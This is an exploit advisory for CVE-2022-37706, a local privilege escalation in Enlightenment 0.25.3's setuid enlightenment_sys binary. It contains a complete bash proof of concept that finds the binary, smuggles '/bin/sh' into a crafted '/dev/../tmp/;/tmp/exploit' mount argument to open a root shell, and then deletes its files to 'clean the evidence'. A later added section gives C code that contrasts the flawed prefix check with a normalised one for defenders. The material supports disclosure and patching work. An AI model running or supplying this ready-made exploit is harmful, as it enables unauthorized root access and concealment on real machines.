## Title: Enlightenment Version: 0.25.3 LPE
## Author: nu11secur1ty
## Date: 12.26.2022
## Vendor: https://www.enlightenment.org/
## Software: https://www.enlightenment.org/download
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706
## Description:
Local privilege escalation is possible with Enlightenment version 0.25.3.
enlightenment_sys in Enlightenment before 0.25.4 permits local users to gain privileges because it is setuid root, and the system library function does not recognize pathnames beginning with a /dev/.. substring.
If an attacker has local access to a machine that the victim uses, and Enlightenment is installed on that machine, he can exploit this vulnerability for very dangerous things.
## STATUS: CRITICAL Vulnerability
## Tested:
```bash
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.10
DISTRIB_CODENAME=kinetic
DISTRIB_DESCRIPTION="Ubuntu 22.10"
PRETTY_NAME="Ubuntu 22.10"
NAME="Ubuntu"
VERSION_ID="22.10"
VERSION="22.10 (Kinetic Kudu)"
VERSION_CODENAME=kinetic
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=kinetic
LOGO=ubuntu-logo
```
[+] Exploit:
```bash
#!/usr/bin/bash
# Ideas by MaherAzzouz
# Nu11secur1ty Development
echo "CVE-2022-37706"
echo "[*] Searching for the vulnerable SUID ..."
echo "[*] It may take a few seconds ..."
# This is the real problem: a setuid-root enlightenment_sys binary
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z $file ]]
then
echo "[-] Can't locate the vulnerable SUID ..."
echo "[*] You should install Enlightenment on your system."
exit 1
fi
echo "[+] Vulnerable. SUID binary was found!"
echo "[+] Popping a root shell!"
mkdir -p /tmp/net
# The mount source begins with /dev/.. so it passes the device-path check
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Welcoming to the rabbit hole:"
$file /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
read -p "Press any key for cleaning the evidence ..."
echo -e
sleep 5
rm -rf /tmp/exploit
rm -rf /tmp/net
echo -e "Done, Everything is clear;;)"
```
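The root cause described above is a device-path check that looks only at how the raw argument begins, so a source of "/dev/../tmp/;/tmp/exploit" is accepted and later reaches a shell command line. The following C is an added illustration for defenders and is not code from Enlightenment or from the PoC author: `weak_is_device_path` models the flawed check as a plain prefix test (an assumption about its exact shape, not the project's real code), and `strict_is_device_path` shows the hardened form, which lexically normalises the path before the prefix test and rejects shell metacharacters.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
/* Lexically normalise an absolute path: collapse "//", "." and ".." with no filesystem access. */
static bool normalize_path(const char *in, char *out, size_t outsz) {
    if (in[0] != '/' || outsz < 2) return false;
    size_t len = 1;  out[0] = '/';            /* out always starts with "/" */
    for (const char *p = in; *p; ) {
        while (*p == '/') p++;
        if (!*p) break;
        const char *seg = p;
        while (*p && *p != '/') p++;
        size_t seglen = (size_t)(p - seg);
        if (seglen == 1 && seg[0] == '.') continue;
        if (seglen == 2 && seg[0] == '.' && seg[1] == '.') {
            /* ".." pops the previous component but never climbs above "/" */
            while (len > 1 && out[len - 1] != '/') len--;
            if (len > 1) len--;
            continue;
        }
        if (len > 1) { if (len + 1 >= outsz) return false; out[len++] = '/'; }
        if (len + seglen >= outsz) return false;
        memcpy(out + len, seg, seglen);
        len += seglen;
    }
    out[len] = '\0';
    return true;
}
/* Model of the flawed check the advisory describes (assumed shape): a raw prefix test. */
bool weak_is_device_path(const char *path) {
    return strncmp(path, "/dev/", 5) == 0;
}
/* Hardened check: normalise, then test the prefix, and refuse shell metacharacters. */
bool strict_is_device_path(const char *path) {
    char norm[4096];
    if (!normalize_path(path, norm, sizeof norm)) return false;
    if (strncmp(norm, "/dev/", 5) != 0) return false;
    return strpbrk(path, ";|&`$(){}<>\n") == NULL;
}
/* Helper for checking results: does path normalise to expected? */
bool normalizes_to(const char *path, const char *expected) {
    char norm[4096];
    return normalize_path(path, norm, sizeof norm) && strcmp(norm, expected) == 0;
}
int main(void) {
    const char *arg = "/dev/../tmp/;/tmp/exploit";  /* the PoC's mount source argument */
    printf("weak: %d  strict: %d\n", weak_is_device_path(arg), strict_is_device_path(arg));
    return 0;
}
```

Running it prints `weak: 1  strict: 0`: the raw prefix test accepts the PoC's argument, the normalised check does not, while a genuine device such as /dev/sdb1 still passes the strict check.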
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)
## Evidence and Exploit
[href](https://streamable.com/zflbgg)
## Time spent
`01:00:00`